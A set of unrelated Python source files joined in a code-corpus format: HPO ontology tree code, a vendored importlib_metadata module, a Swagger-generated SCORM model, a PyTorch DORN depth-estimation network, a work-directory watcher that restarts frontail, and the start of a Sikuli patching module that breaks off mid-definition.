return sorted_genes
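    # Example shape of the result (illustrative ids): [(7, 2), (123, 1)]
    # when two of the given terms share the gene with HGNC id 7.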
def organize_tree(self, all_terms, root):
"""Organizes a set of Tree node objects into a tree, according to their ancestors and children
Args:
all_terms(dict): a dictionary with "term_name" as keys and term_dict as values
root(anytree.Node)
Returns
root(anytree.Node): the updated root node of the tree
"""
# Move tree nodes in the right position according to the ontology
for key, term in all_terms.items():
ancestors = term["ancestors"]
if len(ancestors) == 0:
continue
for ancestor in ancestors:
ancestor_node = search.find_by_attr(root, ancestor)
if ancestor_node is None: # It's probably the term on the top
continue
node = search.find_by_attr(root, key)
node.parent = ancestor_node
return root
def build_phenotype_tree(self, hpo_id):
"""Creates an HPO Tree based on one or more given ancestors
Args:
hpo_id(str): an HPO term
Returns:
tree_dict(dict): a tree of all HPO children of the given term, as a dictionary
"""
root = Node(id="root", name="root", parent=None)
all_terms = {}
unique_terms = set()
def _hpo_terms_list(hpo_ids):
for term_id in hpo_ids:
term_obj = self.hpo_term(term_id)
if term_obj is None:
continue
# sort term children by ascending HPO number
children = sorted(
term_obj["children"], key=lambda x: int("".join([i for i in x if i.isdigit()]))
)
term_obj["children"] = children
all_terms[term_id] = term_obj
if term_id not in unique_terms:
node = Node(term_id, parent=root, description=term_obj["description"])
unique_terms.add(term_id)
# recursive loop to collect children, children of children and so on
_hpo_terms_list(term_obj["children"])
# compile a list of all HPO term objects to include in the submodel
_hpo_terms_list([hpo_id]) # trigger the recursive loop to collect nested HPO terms
# rearrange tree according to the HPO ontology
root = self.organize_tree(all_terms, root)
node_resolver = resolver.Resolver("name")
# Extract a tree structure having the chosen HPO term (hpo_id) as ancestor of all the children terms
term_node = node_resolver.get(root, hpo_id)
LOG.info(f"Built ontology for HPO term:{hpo_id}:\n{RenderTree(term_node)}")
exporter = DictExporter()
# Export this tree structure as dictionary, so that can be saved in database
tree_dict = exporter.export(term_node)
return tree_dict
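    # DictExporter yields one nested mapping per node, roughly:
    #   {'name': 'HP:0000118', 'description': '...', 'children': [...]}
    # (the keys depend on the attributes attached to each anytree Node above)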
|
py | 1a37e37f08b542bebde96c6a73d2c11a4efd2fa4 | from __future__ import unicode_literals, absolute_import
import io
import os
import re
import abc
import csv
import sys
import zipp
import operator
import functools
import itertools
import collections
from ._compat import (
install,
NullFinder,
ConfigParser,
suppress,
map,
FileNotFoundError,
IsADirectoryError,
NotADirectoryError,
PermissionError,
pathlib,
PYPY_OPEN_BUG,
ModuleNotFoundError,
MetaPathFinder,
email_message_from_string,
ensure_is_path,
)
from importlib import import_module
from itertools import starmap
__metaclass__ = type
__all__ = [
'Distribution',
'DistributionFinder',
'PackageNotFoundError',
'distribution',
'distributions',
'entry_points',
'files',
'metadata',
'requires',
'version',
]
class PackageNotFoundError(ModuleNotFoundError):
"""The package was not found."""
class EntryPoint(collections.namedtuple('EntryPointBase', 'name value group')):
"""An entry point as defined by Python packaging conventions.
See `the packaging docs on entry points
<https://packaging.python.org/specifications/entry-points/>`_
for more information.
"""
pattern = re.compile(
r'(?P<module>[\w.]+)\s*'
r'(:\s*(?P<attr>[\w.]+))?\s*'
r'(?P<extras>\[.*\])?\s*$'
)
"""
A regular expression describing the syntax for an entry point,
which might look like:
- module
- package.module
- package.module:attribute
- package.module:object.attribute
- package.module:attr [extra1, extra2]
Other combinations are possible as well.
The expression is lenient about whitespace around the ':',
following the attr, and following any extras.
"""
def load(self):
"""Load the entry point from its definition. If only a module
is indicated by the value, return that module. Otherwise,
return the named object.
"""
match = self.pattern.match(self.value)
module = import_module(match.group('module'))
attrs = filter(None, (match.group('attr') or '').split('.'))
return functools.reduce(getattr, attrs, module)
@property
def extras(self):
match = self.pattern.match(self.value)
return list(re.finditer(r'\w+', match.group('extras') or ''))
@classmethod
def _from_config(cls, config):
return [
cls(name, value, group)
for group in config.sections()
for name, value in config.items(group)
]
@classmethod
def _from_text(cls, text):
config = ConfigParser(delimiters='=')
# case sensitive: https://stackoverflow.com/q/1611799/812183
config.optionxform = str
try:
config.read_string(text)
except AttributeError: # pragma: nocover
# Python 2 has no read_string
config.readfp(io.StringIO(text))
return EntryPoint._from_config(config)
def __iter__(self):
"""
Supply iter so one may construct dicts of EntryPoints easily.
"""
return iter((self.name, self))
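# Illustration (not part of the vendored module): given an entry_points.txt of
#
#     [console_scripts]
#     tool = pkg.cli:main
#
# EntryPoint._from_text(...) yields EntryPoint(name='tool',
# value='pkg.cli:main', group='console_scripts'), and .load() imports
# pkg.cli and returns its `main` attribute.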
class PackagePath(pathlib.PurePosixPath):
"""A reference to a path in a package"""
def read_text(self, encoding='utf-8'):
with self.locate().open(encoding=encoding) as stream:
return stream.read()
def read_binary(self):
with self.locate().open('rb') as stream:
return stream.read()
def locate(self):
"""Return a path-like object for this path"""
return self.dist.locate_file(self)
class FileHash:
def __init__(self, spec):
self.mode, _, self.value = spec.partition('=')
def __repr__(self):
return '<FileHash mode: {} value: {}>'.format(self.mode, self.value)
class Distribution:
"""A Python distribution package."""
@abc.abstractmethod
def read_text(self, filename):
"""Attempt to load metadata file given by the name.
:param filename: The name of the file in the distribution info.
:return: The text if found, otherwise None.
"""
@abc.abstractmethod
def locate_file(self, path):
"""
Given a path to a file in this distribution, return a path
to it.
"""
@classmethod
def from_name(cls, name):
"""Return the Distribution for the given package name.
:param name: The name of the distribution package to search for.
:return: The Distribution instance (or subclass thereof) for the named
package, if found.
:raises PackageNotFoundError: When the named package's distribution
metadata cannot be found.
"""
for resolver in cls._discover_resolvers():
dists = resolver(DistributionFinder.Context(name=name))
dist = next(dists, None)
if dist is not None:
return dist
else:
raise PackageNotFoundError(name)
@classmethod
def discover(cls, **kwargs):
"""Return an iterable of Distribution objects for all packages.
Pass a ``context`` or pass keyword arguments for constructing
a context.
:context: A ``DistributionFinder.Context`` object.
:return: Iterable of Distribution objects for all packages.
"""
context = kwargs.pop('context', None)
if context and kwargs:
raise ValueError("cannot accept context and kwargs")
context = context or DistributionFinder.Context(**kwargs)
return itertools.chain.from_iterable(
resolver(context)
for resolver in cls._discover_resolvers()
)
@staticmethod
def at(path):
"""Return a Distribution for the indicated metadata path
:param path: a string or path-like object
:return: a concrete Distribution instance for the path
"""
return PathDistribution(ensure_is_path(path))
@staticmethod
def _discover_resolvers():
"""Search the meta_path for resolvers."""
declared = (
getattr(finder, 'find_distributions', None)
for finder in sys.meta_path
)
return filter(None, declared)
@property
def metadata(self):
"""Return the parsed metadata for this Distribution.
The returned object will have keys that name the various bits of
metadata. See PEP 566 for details.
"""
text = (
self.read_text('METADATA')
or self.read_text('PKG-INFO')
# This last clause is here to support old egg-info files. Its
# effect is to just end up using the PathDistribution's self._path
# (which points to the egg-info file) attribute unchanged.
or self.read_text('')
)
return email_message_from_string(text)
@property
def version(self):
"""Return the 'Version' metadata for the distribution package."""
return self.metadata['Version']
@property
def entry_points(self):
return EntryPoint._from_text(self.read_text('entry_points.txt'))
@property
def files(self):
"""Files in this distribution.
:return: List of PackagePath for this distribution or None
Result is `None` if the metadata file that enumerates files
(i.e. RECORD for dist-info or SOURCES.txt for egg-info) is
missing.
Result may be empty if the metadata exists but is empty.
"""
file_lines = self._read_files_distinfo() or self._read_files_egginfo()
def make_file(name, hash=None, size_str=None):
result = PackagePath(name)
result.hash = FileHash(hash) if hash else None
result.size = int(size_str) if size_str else None
result.dist = self
return result
return file_lines and list(starmap(make_file, csv.reader(file_lines)))
def _read_files_distinfo(self):
"""
Read the lines of RECORD
"""
text = self.read_text('RECORD')
return text and text.splitlines()
def _read_files_egginfo(self):
"""
SOURCES.txt might contain literal commas, so wrap each line
in quotes.
"""
text = self.read_text('SOURCES.txt')
return text and map('"{}"'.format, text.splitlines())
@property
def requires(self):
"""Generated requirements specified for this Distribution"""
reqs = self._read_dist_info_reqs() or self._read_egg_info_reqs()
return reqs and list(reqs)
def _read_dist_info_reqs(self):
return self.metadata.get_all('Requires-Dist')
def _read_egg_info_reqs(self):
source = self.read_text('requires.txt')
return source and self._deps_from_requires_text(source)
@classmethod
def _deps_from_requires_text(cls, source):
section_pairs = cls._read_sections(source.splitlines())
sections = {
section: list(map(operator.itemgetter('line'), results))
for section, results in
itertools.groupby(section_pairs, operator.itemgetter('section'))
}
return cls._convert_egg_info_reqs_to_simple_reqs(sections)
@staticmethod
def _read_sections(lines):
section = None
for line in filter(None, lines):
section_match = re.match(r'\[(.*)\]$', line)
if section_match:
section = section_match.group(1)
continue
yield locals()
@staticmethod
def _convert_egg_info_reqs_to_simple_reqs(sections):
"""
Historically, setuptools would solicit and store 'extra'
requirements, including those with environment markers,
in separate sections. More modern tools expect each
dependency to be defined separately, with any relevant
extras and environment markers attached directly to that
requirement. This method converts the former to the
latter. See _test_deps_from_requires_text for an example.
"""
def make_condition(name):
return name and 'extra == "{name}"'.format(name=name)
def parse_condition(section):
section = section or ''
extra, sep, markers = section.partition(':')
if extra and markers:
markers = '({markers})'.format(markers=markers)
conditions = list(filter(None, [markers, make_condition(extra)]))
return '; ' + ' and '.join(conditions) if conditions else ''
for section, deps in sections.items():
for dep in deps:
yield dep + parse_condition(section)
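# Illustration (not part of the vendored module): sections parsed from a
# requires.txt such as
#
#     {None: ['pkgA'], 'extra1': ['pkgB'], 'extra2:python_version<"3"': ['pkgC']}
#
# are flattened to
#
#     pkgA
#     pkgB; extra == "extra1"
#     pkgC; (python_version<"3") and extra == "extra2"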
class DistributionFinder(MetaPathFinder):
"""
A MetaPathFinder capable of discovering installed distributions.
"""
class Context:
name = None
"""
Specific name for which a distribution finder should match.
"""
def __init__(self, **kwargs):
vars(self).update(kwargs)
@property
def path(self):
"""
The path that a distribution finder should search.
"""
return vars(self).get('path', sys.path)
@property
def pattern(self):
return '.*' if self.name is None else re.escape(self.name)
@abc.abstractmethod
def find_distributions(self, context=Context()):
"""
Find distributions.
Return an iterable of all Distribution instances capable of
loading the metadata for packages matching the ``context``,
a DistributionFinder.Context instance.
"""
@install
class MetadataPathFinder(NullFinder, DistributionFinder):
"""A degenerate finder for distribution packages on the file system.
This finder supplies only a find_distributions() method for versions
of Python that do not have a PathFinder find_distributions().
"""
def find_distributions(self, context=DistributionFinder.Context()):
"""
Find distributions.
Return an iterable of all Distribution instances capable of
loading the metadata for packages matching ``context.name``
(or all names if ``None`` indicated) along the paths in the list
of directories ``context.path``.
"""
found = self._search_paths(context.pattern, context.path)
return map(PathDistribution, found)
@classmethod
def _search_paths(cls, pattern, paths):
"""Find metadata directories in paths heuristically."""
return itertools.chain.from_iterable(
cls._search_path(path, pattern)
for path in map(cls._switch_path, paths)
)
@staticmethod
def _switch_path(path):
if not PYPY_OPEN_BUG or os.path.isfile(path): # pragma: no branch
with suppress(Exception):
return zipp.Path(path)
return pathlib.Path(path)
@classmethod
def _matches_info(cls, normalized, item):
template = r'{pattern}(-.*)?\.(dist|egg)-info'
manifest = template.format(pattern=normalized)
return re.match(manifest, item.name, flags=re.IGNORECASE)
@classmethod
def _matches_legacy(cls, normalized, item):
template = r'{pattern}-.*\.egg[\\/]EGG-INFO'
manifest = template.format(pattern=normalized)
return re.search(manifest, str(item), flags=re.IGNORECASE)
@classmethod
def _search_path(cls, root, pattern):
if not root.is_dir():
return ()
normalized = pattern.replace('-', '_')
return (item for item in root.iterdir()
if cls._matches_info(normalized, item)
or cls._matches_legacy(normalized, item))
class PathDistribution(Distribution):
def __init__(self, path):
"""Construct a distribution from a path to the metadata directory.
:param path: A pathlib.Path or similar object supporting
.joinpath(), __div__, .parent, and .read_text().
"""
self._path = path
def read_text(self, filename):
with suppress(FileNotFoundError, IsADirectoryError, KeyError,
NotADirectoryError, PermissionError):
return self._path.joinpath(filename).read_text(encoding='utf-8')
read_text.__doc__ = Distribution.read_text.__doc__
def locate_file(self, path):
return self._path.parent / path
def distribution(distribution_name):
"""Get the ``Distribution`` instance for the named package.
:param distribution_name: The name of the distribution package as a string.
:return: A ``Distribution`` instance (or subclass thereof).
"""
return Distribution.from_name(distribution_name)
def distributions(**kwargs):
"""Get all ``Distribution`` instances in the current environment.
:return: An iterable of ``Distribution`` instances.
"""
return Distribution.discover(**kwargs)
def metadata(distribution_name):
"""Get the metadata for the named package.
:param distribution_name: The name of the distribution package to query.
:return: An email.Message containing the parsed metadata.
"""
return Distribution.from_name(distribution_name).metadata
def version(distribution_name):
"""Get the version string for the named package.
:param distribution_name: The name of the distribution package to query.
:return: The version string for the package as defined in the package's
"Version" metadata key.
"""
return distribution(distribution_name).version
def entry_points():
"""Return EntryPoint objects for all installed packages.
:return: EntryPoint objects for all installed packages.
"""
eps = itertools.chain.from_iterable(
dist.entry_points for dist in distributions())
by_group = operator.attrgetter('group')
ordered = sorted(eps, key=by_group)
grouped = itertools.groupby(ordered, by_group)
return {
group: tuple(eps)
for group, eps in grouped
}
def files(distribution_name):
"""Return a list of files for the named package.
:param distribution_name: The name of the distribution package to query.
:return: List of files composing the distribution.
"""
return distribution(distribution_name).files
def requires(distribution_name):
"""
Return a list of requirements for the named package.
:return: An iterator of requirements, suitable for
packaging.requirement.Requirement.
"""
return distribution(distribution_name).requires
try:
__version__ = version(__name__)
except Exception:
__version__ = '0.22'
|
py | 1a37e3932b1651927ac4e5a0ccf30b068f2b9466 | # coding: utf-8
"""
SCORM Cloud Rest API
REST API used for SCORM Cloud integrations. # noqa: E501
OpenAPI spec version: 2.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class LearnerPreferenceSchema(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'audio_level': 'float',
'language': 'str',
'delivery_speed': 'float',
'audio_captioning': 'int'
}
attribute_map = {
'audio_level': 'audioLevel',
'language': 'language',
'delivery_speed': 'deliverySpeed',
'audio_captioning': 'audioCaptioning'
}
def __init__(self, audio_level=None, language=None, delivery_speed=None, audio_captioning=None): # noqa: E501
"""LearnerPreferenceSchema - a model defined in Swagger""" # noqa: E501
self._audio_level = None
self._language = None
self._delivery_speed = None
self._audio_captioning = None
self.discriminator = None
if audio_level is not None:
self.audio_level = audio_level
if language is not None:
self.language = language
if delivery_speed is not None:
self.delivery_speed = delivery_speed
if audio_captioning is not None:
self.audio_captioning = audio_captioning
@property
def audio_level(self):
"""Gets the audio_level of this LearnerPreferenceSchema. # noqa: E501
:return: The audio_level of this LearnerPreferenceSchema. # noqa: E501
:rtype: float
"""
return self._audio_level
@audio_level.setter
def audio_level(self, audio_level):
"""Sets the audio_level of this LearnerPreferenceSchema.
:param audio_level: The audio_level of this LearnerPreferenceSchema. # noqa: E501
:type: float
"""
self._audio_level = audio_level
@property
def language(self):
"""Gets the language of this LearnerPreferenceSchema. # noqa: E501
:return: The language of this LearnerPreferenceSchema. # noqa: E501
:rtype: str
"""
return self._language
@language.setter
def language(self, language):
"""Sets the language of this LearnerPreferenceSchema.
:param language: The language of this LearnerPreferenceSchema. # noqa: E501
:type: str
"""
self._language = language
@property
def delivery_speed(self):
"""Gets the delivery_speed of this LearnerPreferenceSchema. # noqa: E501
:return: The delivery_speed of this LearnerPreferenceSchema. # noqa: E501
:rtype: float
"""
return self._delivery_speed
@delivery_speed.setter
def delivery_speed(self, delivery_speed):
"""Sets the delivery_speed of this LearnerPreferenceSchema.
:param delivery_speed: The delivery_speed of this LearnerPreferenceSchema. # noqa: E501
:type: float
"""
self._delivery_speed = delivery_speed
@property
def audio_captioning(self):
"""Gets the audio_captioning of this LearnerPreferenceSchema. # noqa: E501
:return: The audio_captioning of this LearnerPreferenceSchema. # noqa: E501
:rtype: int
"""
return self._audio_captioning
@audio_captioning.setter
def audio_captioning(self, audio_captioning):
"""Sets the audio_captioning of this LearnerPreferenceSchema.
:param audio_captioning: The audio_captioning of this LearnerPreferenceSchema. # noqa: E501
:type: int
"""
self._audio_captioning = audio_captioning
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(LearnerPreferenceSchema, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LearnerPreferenceSchema):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
py | 1a37e502b0ea4f346396ae07b2671b86d3bb8551 | import os
import torch
import torch.nn as nn
import torchvision.models
import collections
import math
def weights_init(modules, type='xavier'):
    """Initialise the weights of a single module, or of every module in an iterable."""
    m = modules
    if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d)):
        if type == 'xavier':
            torch.nn.init.xavier_normal_(m.weight)
        elif type == 'kaiming':  # msra
            torch.nn.init.kaiming_normal_(m.weight)
        else:
            n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
            m.weight.data.normal_(0, math.sqrt(2. / n))
        if m.bias is not None:
            m.bias.data.zero_()
    elif isinstance(m, nn.BatchNorm2d):
        m.weight.data.fill_(1.0)
        m.bias.data.zero_()
    elif isinstance(m, nn.Linear):
        if type == 'xavier':
            torch.nn.init.xavier_normal_(m.weight)
        elif type == 'kaiming':  # msra
            torch.nn.init.kaiming_normal_(m.weight)
        else:
            m.weight.data.fill_(1.0)
        if m.bias is not None:
            m.bias.data.zero_()
    elif isinstance(m, nn.Module) or hasattr(m, '__iter__'):
        # a container (e.g. nn.Sequential) or an iterator such as self.modules():
        # initialise each contained module in turn
        for child in modules:
            weights_init(child, type)
class FullImageEncoder(nn.Module):
def __init__(self, dataset='kitti'):
super(FullImageEncoder, self).__init__()
self.global_pooling = nn.AvgPool2d(8, stride=8, padding=(1, 0)) # KITTI 16 16
self.dropout = nn.Dropout2d(p=0.5)
self.global_fc = nn.Linear(2048 * 4 * 5, 512)
self.relu = nn.ReLU(inplace=True)
        self.conv1 = nn.Conv2d(512, 512, 1)  # 1x1 convolution
        self.upsample = nn.UpsamplingBilinear2d(size=(30, 40))  # here 30x40 (KITTI uses 49x65, NYU 33x45)
self.dataset = dataset
weights_init(self.modules(), 'xavier')
def forward(self, x):
x1 = self.global_pooling(x)
# print('# x1 size:', x1.size())
x2 = self.dropout(x1)
x3 = x2.view(-1, 2048 * 4 * 5)
x4 = self.relu(self.global_fc(x3))
# print('# x4 size:', x4.size())
x4 = x4.view(-1, 512, 1, 1)
# print('# x4 size:', x4.size())
x5 = self.conv1(x4)
out = self.upsample(x5)
return out
class SceneUnderstandingModule(nn.Module):
def __init__(self, output_channel=136, dataset='kitti'):
super(SceneUnderstandingModule, self).__init__()
self.encoder = FullImageEncoder(dataset=dataset)
self.aspp1 = nn.Sequential(
nn.Conv2d(2048, 512, 1),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 1),
nn.ReLU(inplace=True)
)
self.aspp2 = nn.Sequential(
nn.Conv2d(2048, 512, 3, padding=6, dilation=6),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 1),
nn.ReLU(inplace=True)
)
self.aspp3 = nn.Sequential(
nn.Conv2d(2048, 512, 3, padding=12, dilation=12),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 1),
nn.ReLU(inplace=True)
)
self.aspp4 = nn.Sequential(
nn.Conv2d(2048, 512, 3, padding=18, dilation=18),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 1),
nn.ReLU(inplace=True)
)
self.concat_process = nn.Sequential(
nn.Dropout2d(p=0.5),
nn.Conv2d(512 * 5, 2048, 1),
nn.ReLU(inplace=True),
nn.Dropout2d(p=0.5),
            nn.Conv2d(2048, output_channel, 1),  # KITTI: 142, NYU: 136; the paper finds K = 80 bins best, so 160 output channels (2K) work well
# nn.UpsamplingBilinear2d(scale_factor=8)
nn.UpsamplingBilinear2d(size=(240, 320))
)
weights_init(self.modules(), type='xavier')
def forward(self, x):
x1 = self.encoder(x)
x2 = self.aspp1(x)
x3 = self.aspp2(x)
x4 = self.aspp3(x)
x5 = self.aspp4(x)
x6 = torch.cat((x1, x2, x3, x4, x5), dim=1)
# print('cat x6 size:', x6.size())
out = self.concat_process(x6)
return out
class OrdinalRegressionLayer(nn.Module):
def __init__(self):
super(OrdinalRegressionLayer, self).__init__()
        # self.logsoftmax = nn.LogSoftmax(dim=1)
def forward(self, x):
N, C, H, W = x.size()
ord_num = C // 2
A = x[:, ::2, :, :].clone()
B = x[:, 1::2, :, :].clone()
A = A.view(N, 1, ord_num * H * W)
B = B.view(N, 1, ord_num * H * W)
C = torch.cat((A, B), dim=1)
#C = torch.clamp(C, min=1e-7, max=1e7) # prevent nans
ord_c = nn.functional.softmax(C, dim=1)
ord_c1 = ord_c[:, 1, :].clone()
ord_c2 = nn.LogSoftmax(dim=1)(C)
ord_c1 = ord_c1.view(-1, ord_num, H, W)
ord_c2 = ord_c2.view(-1, ord_num * 2, H, W)
decode_c = torch.sum((ord_c1 >= 0.5), dim=1).view(-1, 1, H, W).float()
return decode_c, ord_c2
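# decode_c counts, per pixel, how many ordinal thresholds have
# P(label > k) >= 0.5 -- i.e. the predicted discrete depth bin -- while
# ord_c2 carries the log-probabilities consumed by the ordinal regression loss.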
class ResNet(nn.Module):
def __init__(self, in_channels=3, pretrained=True, freeze=True):
super(ResNet, self).__init__()
pretrained_model = torchvision.models.__dict__['resnet{}'.format(101)](pretrained=pretrained)
self.channel = in_channels
self.conv1 = nn.Sequential(collections.OrderedDict([
('conv1_1', nn.Conv2d(self.channel, 64, kernel_size=3, stride=2, padding=1, bias=False)),
('bn1_1', nn.BatchNorm2d(64)),
('relu1_1', nn.ReLU(inplace=True)),
('conv1_2', nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=False)),
('bn_2', nn.BatchNorm2d(64)),
('relu1_2', nn.ReLU(inplace=True)),
('conv1_3', nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1, bias=False)),
('bn1_3', nn.BatchNorm2d(128)),
('relu1_3', nn.ReLU(inplace=True))
]))
self.bn1 = nn.BatchNorm2d(128)
# print(pretrained_model._modules['layer1'][0].conv1)
self.relu = pretrained_model._modules['relu']
self.maxpool = pretrained_model._modules['maxpool']
self.layer1 = pretrained_model._modules['layer1']
self.layer1[0].conv1 = nn.Conv2d(128, 64, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layer1[0].downsample[0] = nn.Conv2d(128, 256, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layer2 = pretrained_model._modules['layer2']
self.layer3 = pretrained_model._modules['layer3']
self.layer3[0].conv2 = nn.Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
self.layer3[0].downsample[0] = nn.Conv2d(512, 1024, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layer4 = pretrained_model._modules['layer4']
self.layer4[0].conv2 = nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
self.layer4[0].downsample[0] = nn.Conv2d(1024, 2048, kernel_size=(1, 1), stride=(1, 1), bias=False)
# clear memory
del pretrained_model
if pretrained:
weights_init(self.conv1, type='kaiming')
weights_init(self.layer1[0].conv1, type='kaiming')
weights_init(self.layer1[0].downsample[0], type='kaiming')
weights_init(self.layer3[0].conv2, type='kaiming')
weights_init(self.layer3[0].downsample[0], type='kaiming')
weights_init(self.layer4[0].conv2, 'kaiming')
weights_init(self.layer4[0].downsample[0], 'kaiming')
else:
weights_init(self.modules(), type='kaiming')
if freeze:
self.freeze()
def forward(self, x):
# print(pretrained_model._modules)
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
# print('conv1:', x.size())
x = self.maxpool(x)
# print('pool:', x.size())
x1 = self.layer1(x)
# print('layer1 size:', x1.size())
x2 = self.layer2(x1)
# print('layer2 size:', x2.size())
x3 = self.layer3(x2)
# print('layer3 size:', x3.size())
x4 = self.layer4(x3)
# print('layer4 size:', x4.size())
return x4
def freeze(self):
for m in self.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
class DORN(nn.Module):
def __init__(self, output_size=(240, 320), losstype=1, channel=3, pretrained=True, freeze=True, output_channel=3, dataset='kitti'):
super(DORN, self).__init__()
self.output_size = output_size
self.channel = channel
self.feature_extractor = ResNet(in_channels=channel, pretrained=pretrained, freeze=freeze)
self.aspp_module = SceneUnderstandingModule(output_channel=output_channel, dataset=dataset)
self.orl = OrdinalRegressionLayer()
self.losstype = losstype
    def forward(self, x):
        x1 = self.feature_extractor(x)
        x2 = self.aspp_module(x1)
        # decode the ordinal volume; returns (depth_labels, ord_log_probs),
        # matching the two-value unpacking in __main__ below
        return self.orl(x2)
def get_1x_lr_params(self):
b = [self.feature_extractor]
for i in range(len(b)):
for k in b[i].parameters():
if k.requires_grad:
yield k
def get_10x_lr_params(self):
b = [self.aspp_module, self.orl]
for j in range(len(b)):
for k in b[j].parameters():
if k.requires_grad:
yield k
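# Hedged optimizer sketch (not in the original file): wiring the parameter
# groups above into SGD so the scene-understanding head trains with a 10x
# learning rate relative to the backbone. The rates below are illustrative.
#
#   model = DORN()
#   optimizer = torch.optim.SGD(
#       [{'params': model.get_1x_lr_params(), 'lr': 1e-4},
#        {'params': model.get_10x_lr_params(), 'lr': 1e-3}],
#       lr=1e-4, momentum=0.9)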
# os.environ["CUDA_VISIBLE_DEVICES"] = "1"  # pin the process to a single GPU by default
if __name__ == "__main__":
model = DORN()
model = model.cuda()
model.eval()
image = torch.randn(1, 3, 257, 353)
image = image.cuda()
with torch.no_grad():
out0, out1 = model(image)
print('out0 size:', out0.size())
print('out1 size:', out1.size())
print(out0)
|
py | 1a37e648bfc352f2d5dab53e377ec99c39aa6956 | #!/usr/bin/env python
from os import listdir
from os.path import isfile, join
import pickle
import os
from loguru import logger
def diff(l1, l2):
    """Return the items of l2 that are not in l1."""
    return list(set(l2) - set(l1))
logger.info("Running")
WORK_DIR = os.environ['WORK_DIR']
cur_files = [f for f in listdir(WORK_DIR) if isfile(join(WORK_DIR, f))]
try:
    with open('/tmp/workdir_files.pickle', 'rb') as last_files_pickle:
        last_files = pickle.load(last_files_pickle)
    logger.info("Compare Work Dir")
    # Restart frontail whenever a file has been added or removed.
    if len(diff(cur_files, last_files)) > 0 or len(diff(last_files, cur_files)) > 0:
        logger.warning("Changes found, restarting Frontail")
        os.system("pkill -f frontail")
        os.system("/root/run_trail.sh")
except (OSError, pickle.PickleError):
    # First run or unreadable state file: skip the comparison and rewrite state.
    pass
# Write status
logger.info("Writing current dir status")
with open('/tmp/workdir_files.pickle', 'wb') as cur_files_pickle:
    pickle.dump(cur_files, cur_files_pickle)
|
py | 1a37e65ad250591b851006e39a2b50486df0b9cb | """
Copyright (c) 2013, SMART Technologies ULC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Copyright holder (SMART Technologies ULC) nor
the names of its contributors (Joshua Henn) may be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER (SMART Technologies
ULC) "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from org.sikuli.script import Location, Pattern
import sys
import types
from sikuli import Env, Region
from org.sikuli.script import Region as JRegion
from org.sikuli.script import Env as JEnv
#from config import Config
#from logger import Logger
from sikuli.Sikuli import capture
# =============================================== #
# Overwritten sikuli methods #
# =============================================== #
# function for calling native sikuli methods
def sikuli_method(name, *args, **kwargs):
return sys.modules['sikuli.Sikuli'].__dict__[name](*args, **kwargs)
# overwritten Screen.exists method
def exists(target, timeout=None):
    # addFoundImage/getFilename are expected to be provided by the surrounding
    # test framework (see the commented-out config/logger imports above)
    addFoundImage(getFilename(target))
return sikuli_method('exists', target, timeout)
# =============================================== #
# Overwritten sikuli classes #
# =============================================== #
@staticmethod
def EnvGetOSVersion(fullName=None):
if not fullName:
        return Env.oldGetOSVersion()
elif Env.oldGetOSVersion() == '5.1':
return 'XP'
elif Env.oldGetOSVersion() == '6.0':
return 'Vista'
elif Env.oldGetOSVersion() == '6.1':
return 'Win7'
Env.oldGetOSVersion = Env.getOSVersion
Env.getOSVersion = EnvGetOSVersion
## Java Region patching
def add(self, operand):
